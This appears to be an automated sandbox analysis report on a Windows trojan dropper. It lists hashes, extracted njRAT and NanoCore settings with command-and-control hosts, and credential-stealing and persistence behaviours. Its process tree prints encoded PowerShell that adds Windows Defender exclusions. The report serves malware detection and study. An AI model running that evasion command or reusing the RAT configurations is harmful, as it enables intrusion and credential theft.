Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
06/01/2024, 18:17
Static task
static1
Behavioral task
behavioral1
Sample
80C6039DC12399E3F771632F0A44C4C3.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
80C6039DC12399E3F771632F0A44C4C3.exe
Resource
win10v2004-20231215-en
General
-
Target
80C6039DC12399E3F771632F0A44C4C3.exe
-
Size
1.6MB
-
MD5
80c6039dc12399e3f771632f0a44c4c3
-
SHA1
f609ba2e8bc0d4b395b83f38a4867fcdb9b6bfdd
-
SHA256
f6b10c59c9ce33c5c8f6b02c3293fe5d479e59542698c91b15af74bcce50ab8f
-
SHA512
83b8fb0f9943c11012a82049d7861a3b7ec9753036de402c82ac433a5235cb95a104dd69b29ed110cd9dfe3b8ab062d916956f6f66864bf79876e926c2c5a6a5
-
SSDEEP
49152:2dh0Omwse7edN51glfneOTS9rFJMkn4Rli/Ea:2dcwN25efeIS9rF6k4RQM
Malware Config
Extracted
njrat
0.7d
stupids
hakim32.ddns.net:2000
hands-social.at.ply.gg:46242
d4529f156f8f79f81b02518c9cf09857
-
reg_key
d4529f156f8f79f81b02518c9cf09857
-
splitter
|'|'|
Extracted
nanocore
1.2.2.0
links-transition.gl.at.ply.gg:41958
127.0.0.1:41958
973dbaac-5242-4f6a-aaef-307dad24cdde
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2023-10-14T03:00:38.071092836Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
41958
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
973dbaac-5242-4f6a-aaef-307dad24cdde
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
links-transition.gl.at.ply.gg
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
NirSoft MailPassView 4 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/768-112-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/768-108-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/768-106-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/768-117-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
Nirsoft 4 IoCs
resource yara_rule behavioral1/memory/768-112-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/768-108-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/768-106-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/768-117-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft -
Executes dropped EXE 6 IoCs
pid Process 2192 shadowscripts fixed.exe 2852 microsofts.exe 3032 sanas.scr 2640 FreeScript.exe 2632 Server.exe 2740 Server2223.exe -
Loads dropped DLL 8 IoCs
pid Process 3060 80C6039DC12399E3F771632F0A44C4C3.exe 3060 80C6039DC12399E3F771632F0A44C4C3.exe 3060 80C6039DC12399E3F771632F0A44C4C3.exe 3060 80C6039DC12399E3F771632F0A44C4C3.exe 2192 shadowscripts fixed.exe 2192 shadowscripts fixed.exe 2192 shadowscripts fixed.exe 2192 shadowscripts fixed.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe" Server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Service = "C:\\Program Files (x86)\\TCP Service\\tcpsv.exe" microsofts.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sanas.scr" sanas.scr -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA microsofts.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2852 set thread context of 768 2852 microsofts.exe 38 PID 2852 set thread context of 2936 2852 microsofts.exe 39 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\TCP Service\tcpsv.exe microsofts.exe File opened for modification C:\Program Files (x86)\TCP Service\tcpsv.exe microsofts.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3012 powershell.exe 320 powershell.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2852 microsofts.exe 2936 vbc.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2852 microsofts.exe 3032 sanas.scr -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 2852 microsofts.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3032 sanas.scr 2632 Server.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3032 sanas.scr 2632 Server.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 3060 wrote to memory of 2192 3060 80C6039DC12399E3F771632F0A44C4C3.exe 28 PID 3060 wrote to memory of 2192 3060 80C6039DC12399E3F771632F0A44C4C3.exe 28 PID 3060 wrote to memory of 2192 3060 80C6039DC12399E3F771632F0A44C4C3.exe 28 PID 3060 wrote to memory of 2192 3060 80C6039DC12399E3F771632F0A44C4C3.exe 28 PID 3060 wrote to memory of 2852 3060 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 3060 wrote to memory of 2852 3060 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 3060 wrote to memory of 2852 3060 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 3060 wrote to memory of 2852 3060 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 3060 wrote to memory of 3032 3060 80C6039DC12399E3F771632F0A44C4C3.exe 36 PID 3060 wrote to memory of 3032 3060 80C6039DC12399E3F771632F0A44C4C3.exe 36 PID 3060 wrote to memory of 3032 3060 80C6039DC12399E3F771632F0A44C4C3.exe 36 PID 3060 wrote to memory of 3032 3060 80C6039DC12399E3F771632F0A44C4C3.exe 36 PID 2192 wrote to memory of 320 2192 shadowscripts fixed.exe 35 PID 2192 wrote to memory of 320 2192 shadowscripts fixed.exe 35 PID 2192 wrote to memory of 320 2192 shadowscripts fixed.exe 35 PID 2192 wrote to memory of 320 2192 shadowscripts fixed.exe 35 PID 2192 wrote to memory of 3012 2192 shadowscripts fixed.exe 30 PID 2192 wrote to memory of 3012 2192 shadowscripts fixed.exe 30 PID 2192 wrote to memory of 3012 2192 shadowscripts fixed.exe 30 PID 2192 wrote to memory of 3012 2192 shadowscripts fixed.exe 30 PID 2192 wrote to memory of 2640 2192 shadowscripts fixed.exe 31 PID 2192 wrote to memory of 2640 2192 shadowscripts fixed.exe 31 PID 2192 wrote to memory of 2640 2192 shadowscripts fixed.exe 31 PID 2192 wrote to memory of 2640 2192 shadowscripts fixed.exe 31 PID 2192 wrote to memory of 2632 2192 shadowscripts fixed.exe 33 PID 2192 wrote to memory of 2632 2192 shadowscripts fixed.exe 33 PID 2192 wrote to memory of 2632 2192 shadowscripts fixed.exe 33 PID 2192 wrote to memory of 2632 2192 shadowscripts fixed.exe 33 PID 2192 wrote to memory of 2740 2192 shadowscripts fixed.exe 32 PID 2192 wrote to memory of 2740 2192 shadowscripts fixed.exe 32 PID 2192 wrote to memory of 2740 2192 shadowscripts fixed.exe 32 PID 2192 wrote to memory of 2740 2192 shadowscripts fixed.exe 32 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 768 2852 microsofts.exe 38 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39 PID 2852 wrote to memory of 2936 2852 microsofts.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"3⤵
- Executes dropped EXE
PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\Server2223.exe"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"3⤵
- Executes dropped EXE
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\sanas.scr"C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032
-
-
C:\Users\Admin\AppData\Local\Temp\microsofts.exe"C:\Users\Admin\AppData\Local\Temp\microsofts.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\0bvuh0yt.zfe"3⤵
- Accesses Microsoft Outlook accounts
PID:768
-
-
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\qad1ehsl.ym4"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2936
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
523B
MD569b2a2e17e78d24abee9f1de2f04811a
SHA1d19c109704e83876ab3527457f9418a7d053aa33
SHA2561b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd
SHA512eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f
-
Filesize
913KB
MD5799c188cf6df366f4c0f98b8800a4977
SHA1161d6006518879ecba6cf45b29599992d8eadfce
SHA25632e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA51232a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1
-
Filesize
93KB
MD586757f6c08b6cb698250cc9fc1816a8e
SHA1fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a
SHA25698fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff
SHA512cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc
-
Filesize
202KB
MD55fdd418baf9c0d789e67758ad9f2dd1a
SHA1c0be3be193af670cfe01a64aef7c5b0a0b9d091a
SHA25682f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47
SHA5129ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50
-
Filesize
897KB
MD5cff6bd15ff11608502d43c19584783a7
SHA1740c5153ee4e4799d75758007195c6bf0c5d4a40
SHA2560cb43babac1cc190cd461163307ea306f8cf14688889ce6aaa77b1c7548b85bd
SHA512c75fc0bb4abed4fe6dbe74e74dbdc9bf311996aaf7a8dc7870e573d6d6be33d7ce0cc5130160f2099fd6f15c1389c48f909322e5a1fda385dcc8a260c9858e8d
-
Filesize
183KB
MD5b7cedaa564e3fb095f94aef59f7ed0da
SHA13f93a84f2d290840cfb5418e15c47dda39ab967d
SHA256526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc
SHA51218d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d
-
Filesize
1.0MB
MD55f2ee29ef8f1d3ce52051b89eb690636
SHA106ac76ef4070e0f0144f151f0ed927042789258a
SHA256bd2faaed9c8559f55ee3bfce7658b27dc21cfc5606c665561401dc5fdad7c14b
SHA512bcc2b3e8e2032c58daa2ed554888b97c34cc60e085f713cce5f5593aec0f7ad4213cd684e3e1e1ff06ac8466342f6e2c9a9133531d2579649a06f397d26b3800